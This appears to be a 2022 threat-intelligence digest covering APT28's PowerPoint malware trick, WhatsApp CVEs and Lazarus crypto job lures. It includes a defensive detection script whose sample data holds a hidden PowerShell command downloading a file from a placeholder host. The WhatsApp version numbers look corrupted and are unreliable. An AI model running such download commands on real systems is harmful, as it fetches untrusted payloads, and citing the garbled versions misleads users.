29th September, 2022
Hackers use PowerPoint mouse over trick to deploy malware
APT28, the Russian state-sponsored threat actor, has been found leveraging a new code execution method. It involves a PowerPoint file: execution is triggered when the victim enters presentation mode and moves their mouse. Once the mouse has moved, a PowerShell script downloads and executes a dropper from OneDrive. This file appears to be a harmless image but functions as a follow-on payload; the malware is a variant of Graphite, which uses the Microsoft Graph API and OneDrive for C2 communications. The PowerPoint file has been crafted to target the defence and government sectors in Europe, posing as the Organisation for Economic Co-operation and Development (OECD), a Paris-based government entity.
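The chain above ends with PowerPoint spawning PowerShell to fetch a remote file, which is a process lineage that rarely occurs legitimately. The following added detection example (not part of the original report or any vendor tooling) scores constructed Sysmon-style process-creation records on exactly that lineage, raising confidence when the child command line carries a download cue; the event field names, sample paths and URL are assumptions.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 (process creation) records, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # benign: PowerPoint launched from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
        "CommandLine": r'"POWERPNT.EXE" C:\Users\alice\Downloads\deck.ppsx',
    },
    {  # suspicious: PowerPoint spawning a hidden PowerShell that fetches a file
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/d/DSC0002.jpeg -OutFile $env:TEMP\\a.jpeg"',
    },
    {  # lower confidence: PowerPoint spawning PowerShell with no download cue
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -c Get-Date",
    },
]

OFFICE_PARENTS = {"powerpnt.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe"}
# Cues that the child is fetching a remote payload, as in the OneDrive download described above.
DOWNLOAD_CUES = re.compile(r"https?://|invoke-webrequest|\biwr\b|downloadstring|downloadfile|onedrive", re.I)

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> str:
    """Return 'high', 'medium' or 'none' for a single process-creation event."""
    if _basename(event["ParentImage"]) not in OFFICE_PARENTS:
        return "none"
    if _basename(event["Image"]) not in SCRIPT_CHILDREN:
        return "none"
    # Office spawning a script host is itself unusual; a remote-fetch cue raises confidence.
    return "high" if DOWNLOAD_CUES.search(event.get("CommandLine", "")) else "medium"

def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per event that matches the PowerPoint -> PowerShell lineage."""
    findings = []
    for ev in events:
        sev = classify(ev)
        if sev != "none":
            findings.append({"severity": sev, "parent": _basename(ev["ParentImage"]),
                             "child": _basename(ev["Image"]), "cmd": ev.get("CommandLine", "")})
    return findings

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity'].upper()}] {f['parent']} -> {f['child']}: {f['cmd']}")
```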
Critical WhatsApp bugs that can let attackers hack devices
WhatsApp is famous for its encrypted messaging service, which is used by hundreds of millions of people around the world. However, Meta (its parent company) has just released patches for two separate critical vulnerabilities. The first is CVE-2022-36934 (CVSS score: 9.8), an integer overflow vulnerability that allows an attacker to execute arbitrary code by establishing a video call. The second bug is similar but involves an integer underflow vulnerability, meaning that the function expected a larger input than the one provided. Meta has released patches for Apple and Android: Android users need to update to version 220.127.116.11 or higher, and Apple users to 18.104.22.168 or higher. Malwarebytes has stated that the vulnerabilities reside in two components, ‘Video Call Handler’ and ‘Video File Handler’, and can allow an attacker to seize control of the app.
Lazarus Group Targeting Crypto Job Hunters
In recent months the North Korean Lazarus Group has been sending unsolicited job opportunities for cryptocurrency-based roles in order to deliver malware designed for macOS. Cyber security company SentinelOne discovered last week that positions at the Singapore-based crypto exchange Crypto[.]com have been used as the lure. This latest discovery adds to very similar attempts found in August by another cyber security firm, ESET, in which the job opportunity was crafted to look like it was for Coinbase, another well-known and widely used cryptocurrency exchange. Both of these malware-laden advertisement campaigns fall under a larger ongoing series of attacks known as Operation In(ter)ception, or Operation Dream Job. If a user clicks on the advertisement, a decoy PDF is downloaded and opened while, in the background, the Apple Terminal’s saved state (‘com.apple.Terminal.savedState’) is deleted. A second stage is then initiated, which runs a copycat of the ‘FinderFontsUpdater.app’ program called ‘WifiAnalyticsServ.app’. This extracts and executes the binaries making up the third stage of the attack, ‘wifianalyticsagent’, which acts as a beacon to the attackers’ command and control server. Because the C2 server is currently offline, the final payload is unknown. As phishing attacks get more advanced, it’s vital to check that all the details seem legitimate before accessing these kinds of ads or accidentally downloading malicious documents.